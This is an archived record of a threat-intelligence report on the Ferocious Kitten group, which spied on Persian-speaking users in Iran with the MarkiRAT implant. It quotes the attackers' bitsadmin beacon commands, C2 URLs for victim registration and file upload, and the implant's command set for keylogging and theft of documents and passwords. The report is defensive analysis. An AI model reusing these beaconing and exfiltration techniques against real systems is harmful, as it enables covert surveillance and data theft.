{
	"id": "b4ab23b3-0cb8-413f-9917-458dd24c81de",
	"created_at": "2026-04-06T00:06:51.253361Z",
	"updated_at": "2026-04-10T03:35:17.064302Z",
	"deleted_at": null,
	"sha1_hash": "45de45d06730df7b420ca326a1c792ecabb3ce0a",
	"title": "Ferocious Kitten: 6 years of covert surveillance in Iran",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1520050,
	"plain_text": "Ferocious Kitten: 6 years of covert surveillance in Iran\r\nBy GReAT\r\nPublished: 2021-06-16 · Archived: 2026-04-05 12:50:25 UTC\r\nFerocious Kitten is an APT group that since at least 2015 has been targeting Persian-speaking individuals who\r\nappear to be based in Iran. Although it has been active for a long time, the group has mostly operated under the\r\nradar and has not been covered by security researchers to the best of our knowledge. It is only recently that it drew\r\nattention when a lure document was uploaded to VirusTotal and went public thanks to researchers on Twitter.\r\nSince then, one of its implants has been analyzed by a Chinese threat intelligence firm.\r\nWe were able to expand on some of the findings about the group and provide insights into the additional variants\r\nthat it uses. The malware dropped from the aforementioned document is dubbed ‘MarkiRAT’ and used to record\r\nkeystrokes, clipboard content, provide file download and upload capabilities as well as the ability to execute\r\narbitrary commands on the victim machine. We were able to trace the implant back to at least 2015, where it also\r\nhad variants intended to hijack the execution of the Telegram and Chrome applications as a persistence method.\r\nInterestingly, some of the TTPs used by this threat actor are reminiscent of other groups that are active against a\r\nsimilar set of targets, such as Domestic Kitten and Rampant Kitten. In this report we aim to provide more details\r\non these findings and our own analysis on the mechanics of the MarkiRAT malware.\r\nBackground\r\nTwo suspicious documents that were uploaded to VirusTotal in July 2020 and March 2021, and which seem to be\r\noperated by the same attackers, caught our attention. 
One of the documents is called “عاشقان با عاشقانه همبستگی\r\n2آزادی.doc” (translates from Persian as “Romantic Solidarity With Lovers of Freedom2.doc”) and contains\r\nmalicious macros that are accompanied by an odd decoy message attempting to convince the victim to enable its\r\ncontent:\r\nhttps://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/\r\nPage 1 of 13\n\nDecoy content in one of the malicious documents\r\nAfter enabling their content, both documents drop malicious executables to the infected system and display\r\nmessages against the regime in Iran, such as the following (translated from Persian):\r\nI am Hussein Jafari\r\nI was a prisoner of the regime during 1363-64.\r\nAdd my name to the prisoners' statement of Iraj Mesdaghi about the bloodthirsty mercenary.\r\nPlease use the nickname Jafar for my own safety and my family.\r\nHussein Jafari\r\nJuly 1399\r\nMessages that appear in the documents after enabling their content\r\nThe macros in the documents convert an embedded executable from hexadecimal and write it to the “Public”\r\nfolder as “update.exe”. Afterwards, the payload gets copied to the “Startup” directory under the name\r\n“svehost.exe” to ensure it automatically runs when the system is started:\r\nMacros copying the payload to the startup folder\r\nIn addition to the above documents, we managed to find malicious executables that were used by the attackers and\r\ndate back to as early as 2015. 
It seems that in the past the attackers delivered executables directly to the victims\r\nand only recently introduced weaponized documents as the initial infection vector.\r\nMoreover, the attackers used the “right-to-left override” technique that causes parts of the executables’ names to\r\nbe reversed, making them appear to have a different extension such as .jpg or .mp4, rather than their real one.\r\nWhen run, the executables display decoy content to the victims, with some presenting images of protests against\r\nthe Iranian regime and its institutions, or videos from resistance camps.\r\nDecoy image found within one of the malicious executables showing a protest against the central bank of Iran\r\nAnalysis of MarkiRAT\r\nThe aforementioned infection vectors are used to deploy unique malware we dubbed MarkiRat. While we were\r\nable to identify several versions of it, it is evident that the core of the malware remained the same. The internal\r\nname of the implant, as becomes apparent from PDB paths in the executable binaries, is ‘mklg’. This name\r\nperhaps stands for ‘Mark KeyLogGer’, where ‘Mark’ is an internal HTML tag used by the implant.\r\nDuring its activity, we could see that the authors changed the compilation environment and incorporated new\nlibraries to hinder both manual and automatic static analysis. From 2015 to February 2018, the malware was\ncompiled with Visual Studio 2013 and 2015, whereas in February 2018, the developers moved to Visual Studio\n2017 and embedded the malware’s logic within Microsoft Foundation Class (MFC) classes. 
In accordance with\nthese changes, the internal name was also modified to ‘mfcmklg.pdb’.\nThe MarkiRAT implant starts by performing the following actions:\nCreates a mutex named “Global\\\\{2194ABA1-BFFA-4e6b-8C26-D1BB20190312}” during initialization of\nan MFC CWnd class instance.\nExpands the environment variable ‘PUBLIC’ to be used as the base directory for the malware’s work\nrepository, which is located under ‘Appdata\\Windows’.\nChecks the running processes on the victim machine to look for ‘exe’ (Kaspersky) or ‘bdagent.exe’\n(Bitdefender). If one of them is found it will be indicated using a numeric value passed to the server via a\nparameter named ‘k’, using a GET request to the URL as outlined below. The presence of a security\nsolution from Kaspersky will be denoted with the value ‘1’ and Bitdefender with the value ‘3’. However,\nno change in the malware’s behavior was observed based on this check.\nhxxp://C2/ech/client.php?u=[computername]_[username]\u0026k=[AV_value]\nCreates a log file named ‘nfo’ with information as shown below (time of the implant’s initiation and its\nexecution path).\n\n==Hello: Fri Mar 5 18:56:27 2021\n==  \n==C:\\Users\\[username]\\AppData\\Local\\Temp\\sample.exe==\nInitiates communication with the C2 server by issuing an HTTP POST request, registering the victim as a\nnew client using the URL scheme and body content specified below:\nPOST hxxp://[C2 address]/i.php?u=[computername]_[username]\u0026i=[IP address]\np=  \n**Windows Title1**\n\n**Windows Title2**  \nThe expected server response acknowledging registration is:\nIssues an additional beacon to the C2 server by using Microsoft’s BITS administration utility with the\nfollowing commands:\n\u003e bitsadmin /cancel pdj\n\u003e bitsadmin /create pdj\n\u003e bitsadmin /SetPriority pdj HIGH\n\u003e bitsadmin /addfile pdj \"hxxp://[C2 
address]/i.php?u=[computername]-[username]\u0026i=[proxy ip]\" %PUBLIC%\\AppData\\Libs\\p.b\r\n\u003e bitsadmin /resume pdj\r\nThe purpose of this part is not entirely clear, but we think it’s probably used to bypass a potential proxy\r\nserver in the victim network, thus providing the C2 with the victim’s IP.\r\nStarts a keylogger with all keystrokes and clipboard content being stored locally in the aforementioned .nfo\r\nfile, exfiltrated to the C2 using the same URL described previously in the POST request. It is interesting to\r\nnote that an active Keepass (password manager) process gets killed before starting the keylogger. This is\r\nlikely intended to force the user to restart the program and enter a master password that is then stolen via\r\nthe keylogger.\r\nFollowing these actions, the malware initiates a thread to constantly beacon the C2, waiting to receive commands\r\nand executing them accordingly. The beacon is issued with the following request:\r\nGET hxxp://[C2 address]/ech/echo.php?req=rr\u0026u=[computername]_[username]\r\nThe expected response carries a command to be executed and needs to be formatted as JSON. It is then parsed\r\nusing the open-source library JsonCPP, where the following commands are supported:\r\ncmd | cmd2 | cmd3 | Description\r\ndelay | argument: time to sleep in milliseconds | – | Sleep for a given amount of milliseconds\r\nuploadsf | argument: path to directory that will be enumerated for file upload | – | Upload all the files in the argument repository. The upload is performed by using the following POST request: hxxps://[C2]/up/uploadx.php?=u=[computername]_[username]\r\nuploads | argument: path to directory that will be enumerated for file upload | – | Upload files in the argument repository. The malware is looking for files carrying specific extensions: .rtf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pps, .ppsx, .txt, .gpg, .pkr, .kdbx, .key, .jpg. These formats suggest that the threat actor is interested in Office documents, encryption keys, password manager files and image files. The upload is performed by using the same POST request as the one used by the ‘uploadsf’ command\r\nupload | argument: path to file to upload | – | Upload a specific file (argument) using the same URL as the ‘uploadsf’ command\r\nsmart | dir | – | List files and repositories. The listing is sent to hxxp://[C2]/ech/rite.php\r\nsmart | upload | – | Upload files carrying specific extensions (.pdf, .rtf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pps, .ppsx, .txt; .jpg, .kdbx, .key) from pre-defined, common directories, namely: Desktop, Documents, Pictures, Downloads, ViberPC, Skype, Telegram and additional drives.\r\nsmart | fulldir | – | List files and directories looking for filenames with the specific extensions (.pdf, .rtf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pps, .ppsx, .txt; .jpg, .kdbx, .key) located in pre-defined, common directories: Desktop, Documents, Pictures, Downloads, ViberPC, Skype, Telegram and additional drives. The listing is sent to hxxp://[C2]/ech/rite.php\r\nruninhome | argument: executable file name | – | Run an executable located in the malware repository in the user’s home directory.\r\ndownload | argument1: URL to download the file | argument2: path to store the downloaded file | Download a file from the C2 server and store locally (filename: argument2)\r\nAny other command that doesn’t fit the above patterns will be forwarded and processed as an argument to\r\n‘cmd.exe /c’ and run via the ‘ShellExecuteW’ API. 
Additionally, each beacon is accompanied with a screenshot\r\nthat is initially saved as ‘scr.jpg’ in the public directory and subsequently issued to the C2 using the same HTTP\r\nPOST request as in the ‘uploadsf’ command.\r\nTelegram hijacking variant\r\nOne of the discovered MarkiRAT variants was used to intercept the execution of Telegram and launch the malware\r\nalong with it. The core of the malware is the same as described previously for MarkiRAT, with the exception of\r\nfunctions in charge of the malware’s deployment on the victim machine. These conduct the following actions:\r\nCheck for the Telegram installation directory by enumerating the files on disk and looking for the ‘exe’\r\nbinary in a directory named ‘tdata’ (internal repository used by the Telegram desktop utility).\r\nIf the file exists, the malware copies itself to the same directory as ‘exe’, while preserving the icon of the\r\nTelegram application.\r\nModify the shortcut that launches Telegram by replacing its path to the one corresponding to ‘exe’, as\r\noutlined below.\r\nTelegram shortcut launching the payload along with the legitimate executable\r\nFollowing these actions, if ‘data.exe’ is executed as a result of initiating Telegram, the usual deployment logic is\r\nskipped and the malware directly executes the real Telegram application along with the malicious MarkiRAT\r\npayload.\r\nChrome hijacking variant\r\nAnother interesting variant targets the Chrome browser and can be split into two components going by the\r\nfollowing internal names (as evident from the PDB paths left in them):\r\nmklgsecondary.pdb\r\nmklgchrome.pdb\r\nThe first stage logic is performed by ‘mklgsecondary’ which serves the purpose of downloading a file named\r\n‘chrome.txt’ from a C2 server using the 
BITS utility. The downloader modifies the Chrome shortcut using the\r\nsame method previously described for the Telegram variant. The downloaded PE file (‘chrome.txt’/’mklgchrome’)\r\ngets executed each time the user starts Chrome, thereby running the real Chrome application as well as executing\r\nthe MarkiRAT payload. As is the case with variants targeting Telegram installations, the usual initialization routine\r\nis skipped.\r\nDownloader\r\nOne unique and fairly recent variant is a plain downloader that follows a similar convention to the aforementioned\r\nMarkiRAT implants. It also leverages MFC and embeds its logic within a CDialog class, getting executed upon\r\ninitiation of an MFC dialog object during runtime. Notably, it contains the PDB path\r\n‘D:\\mklgs\\mfcdownl\\Release\\mfcdownl.pdb’, resembling those used by the malware authors in all other variants,\r\nand contacts the C2 server behind the domain ‘microsoft.com-view[.]space’, which was also observed in other\r\nrecent MarkiRAT samples. The use of this sample diverges from those used by the group in the past, where the\r\npayload was dropped by the malware itself, suggesting that the group might be in the process of changing some of\r\nits TTPs.\r\nThe execution flow of this component is mostly straight-forward and consists of the following actions:\r\nThe malware checks for command line arguments containing a URL path to the C2 server and the file\r\nname used for the downloaded executable. 
If less than three arguments are passed, the program terminates.\r\nThe file is downloaded from the hardcoded domain ‘com-view[.]space’ using the WinHttp API, passing the\r\nsecond argument as the server path from which the file will be downloaded and employing the third\r\nargument for the retrieved payload’s filename to be saved in the %PUBLIC% directory.\r\nThe malware generates a numeric value based on the current system time and uses it to rename the\r\ndownloaded binary (i.e., it will be stored as \u003cnumeric_value\u003e.exe in the %PUBLIC% directory).\r\nFinally, the downloaded payload is executed by resolving the path of exe and passing the newly generated\r\npath of the downloaded binary as an argument. The resulting command line is initiated as a new process\r\nusing the ‘CreateProcessW’ API function.\r\nInterestingly, the sample contains hardcoded strings in Arabic taken from the Quran that appear at the beginning of\r\nthe function with the malware’s business logic. The second verse means “And We shall raise a barrier in front of\r\nthem and a barrier behind them, and cover them over so that they will not be able to see.” It is often used when\r\none is being chased by an enemy, in the hope that they are overlooked.\r\nVerses from the Quran in the malware\r\nEvidence of Android implants\r\nApart from the PE malware, we were able to identify several URLs in our telemetry that suggest there were\r\nAndroid applications hosted on the C2 infrastructure:\r\nhxxp://updatei[.]com/ddd/classes.dex\r\nhxxp://updatei[.]com/hr.apk\r\nUnfortunately, we were unable to obtain the underlying samples and can therefore only assume that these are\r\nmalicious implants targeted at mobile users, developed and leveraged by the threat actor. 
That said, similar activity\r\naimed at targets in Iran suggests that actors engaged in this type of pursuit may very well be operating several\r\ncampaigns, each focusing on a different technical platform with categorized targeting based on victim profiles. An\r\nexample of this was mentioned in our recent APT trends report and discussed more thoroughly in a private report\r\ndelivered to customers of our APT reporting service, where we identified the DomesticKitten threat actor\r\nspreading both Windows- and Android-based malware against Persian-speaking users within the same timeframe.\r\nWho are the targets?\r\nThe attack appears to be mainly targeting Iranian victims. In addition to the mostly Persian file names, some of the\r\nmalicious websites used subdomains impersonating popular services in Iran to appear legitimate. For example,\r\n“aparat.com-view[.]space” was mimicking Aparat, an Iranian video sharing service, while “khabarfarsi.com-view[.]org” was mimicking an Iranian news website.\r\nIn addition to the Telegram payload variant analyzed above, one of the malicious samples discovered was a\r\nbackdoored version of Psiphon, an open-source VPN tool often used to bypass internet censorship. The targeting\r\nof Psiphon and Telegram, both of which are quite popular services in Iran, underlines the fact that the payloads\r\nwere developed with the purpose of targeting Iranian users in mind. Moreover, the decoy content displayed by the\r\nmalicious files often made use of political themes and involved images or videos of resistance bases or strikes\r\nagainst the Iranian regime, suggesting the attack is aimed at potential supporters of such movements within the\r\ncountry.\r\nA stronger indicator for the aforementioned victim profile can be observed in the code itself, particularly in the\r\nkeylogger’s logic. Before writing a keystroke to the log, the malware obtains the current locale identifier using the\r\n‘GetKeyboardLayout’ API. 
The retrieved value is checked against several hardcoded paths in which the low\r\nDWORD is set to 0x0429. This value corresponds to the Persian language ID, thereby solidifying the assessment\r\nthat the targeted users are Persian speaking.\r\nLocale check before writing a keystroke to a file, showing hardcoded values corresponding to the Persian\r\nlanguage ID (0x0429)\r\nThe Kitten connection\r\nDuring our analysis we found similarities between Ferocious Kitten and other threat groups, namely Domestic\r\nKitten and Rampant Kitten, both in terms of their TTPs and victims. Like Domestic Kitten, Ferocious Kitten has\r\nused the same set of C2 servers over long periods of time and shows the same URL patterns for C2\r\ncommunication using only three letters such as “updatei[.]com/fff/” or “updatei[.]com/fil/”.\r\nJust like Rampant Kitten, both threat groups attempted to gather information from the Keepass password manager\r\nand changed the execution flow of Telegram Desktop to ensure the persistence of their malware. And although we\r\nwere unable to find solid connections between the codebase or infrastructure of these groups, the various\r\ncampaigns operated by the three threat groups share a distinct targeting scheme and go after Iranian victims.\r\nThe WHOIS information of the malicious domains showed that Ferocious Kitten used Iranian hosting services\r\nsuch as Pardaz IT or Farasat IT Group. 
Furthermore, some of the PDBs in the malicious samples from 2017\r\nmentioned the name “Ghabli” (e.g., ‘D:\\ghabli\\Projects\\mklgtelegram\\Release\\mklgtelegram.pdb’), which appears\r\nto be a Persian surname.\r\nPDB path from a Ferocious Kitten sample\r\nAn interesting thing to note is that one of the domains we are monitoring for related activity, ‘updatei[.]com’,\r\nappeared in a Facebook page called “Iranian Association of Combatant Programmers” (translated from Persian).\r\nThe attackers registered this domain in February 2015, and the post was published in March of the same year. The\r\nURL mentioned in the post was meant to download an archive called “cports.rar” that supposedly contained the\r\n“cports.exe” tool; unfortunately, we couldn’t examine the archive’s contents because the website was down at the\r\ntime of analysis.\r\nTranslated post from Facebook page mentioning one of the malicious domains\r\nConclusions\r\nFerocious Kitten is an example of an actor that operates in a wider ecosystem intended to track individuals in Iran.\r\nSuch threat groups do not appear to be covered that often and can therefore get away with casually reusing\r\ninfrastructure and toolsets without worrying about them being taken down or flagged by security solutions.\r\nAdditionally, such groups are known to target various platforms (most notably Windows and Android) and often\r\nshare TTPs, as indicated in this report. The latter in particular may suggest that the underlying actors may be\r\ninterconnected, sharing developers or operating under a mutual supervisor. While not technically impressive, it’s\r\ninteresting that the actor created specialized variants to be launched alongside popular programs, namely Chrome\r\nand Telegram. 
The technical sophistication of the toolset doesn’t appear to be a high priority for the attackers, who\r\nseem to be more intent on expanding their arsenal.\r\nIOCs\r\nSource: https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MISPGALAXY",
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/"
	],
	"report_names": [
		"102806"
	],
	"threat_actors": [
		{
			"id": "4a1e62ec-42d0-47c3-8b65-b3c5d9c496c0",
			"created_at": "2022-10-25T16:07:23.609046Z",
			"updated_at": "2026-04-10T02:00:04.686029Z",
			"deleted_at": null,
			"main_name": "Ferocious Kitten",
			"aliases": [
				"G0137"
			],
			"source_name": "ETDA:Ferocious Kitten",
			"tools": [
				"MarkiRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "44d5df14-6a25-41d6-a54c-7c7ebac358cf",
			"created_at": "2023-01-06T13:46:38.817312Z",
			"updated_at": "2026-04-10T02:00:03.111227Z",
			"deleted_at": null,
			"main_name": "Domestic Kitten",
			"aliases": [
				"Bouncing Golf",
				"APT-C-50"
			],
			"source_name": "MISPGALAXY:Domestic Kitten",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e580dec5-1558-4c79-8eda-c968d1cd206f",
			"created_at": "2022-10-25T16:07:24.090829Z",
			"updated_at": "2026-04-10T02:00:04.863398Z",
			"deleted_at": null,
			"main_name": "Rampant Kitten",
			"aliases": [],
			"source_name": "ETDA:Rampant Kitten",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "75297180-4681-4500-ad0e-cde0edeb1ed2",
			"created_at": "2024-02-06T02:00:04.156486Z",
			"updated_at": "2026-04-10T02:00:03.581217Z",
			"deleted_at": null,
			"main_name": "Ferocious Kitten",
			"aliases": [],
			"source_name": "MISPGALAXY:Ferocious Kitten",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "30f6ddb3-f5aa-4b78-a1a5-e37c42b2c560",
			"created_at": "2022-10-25T16:07:23.544297Z",
			"updated_at": "2026-04-10T02:00:04.64999Z",
			"deleted_at": null,
			"main_name": "Domestic Kitten",
			"aliases": [
				"APT-C-50",
				"Bouncing Golf",
				"G0097"
			],
			"source_name": "ETDA:Domestic Kitten",
			"tools": [
				"FurBall",
				"GolfSpy"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "306b00c6-fec4-4698-86c5-2aed9feedd38",
			"created_at": "2022-10-25T15:50:23.444155Z",
			"updated_at": "2026-04-10T02:00:05.401052Z",
			"deleted_at": null,
			"main_name": "Ferocious Kitten",
			"aliases": [
				"Ferocious Kitten"
			],
			"source_name": "MITRE:Ferocious Kitten",
			"tools": [
				"MarkiRAT",
				"BITSAdmin"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434011,
	"ts_updated_at": 1775792117,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/45de45d06730df7b420ca326a1c792ecabb3ce0a.pdf",
		"text": "https://archive.orkl.eu/45de45d06730df7b420ca326a1c792ecabb3ce0a.txt",
		"img": "https://archive.orkl.eu/45de45d06730df7b420ca326a1c792ecabb3ce0a.jpg"
	}
}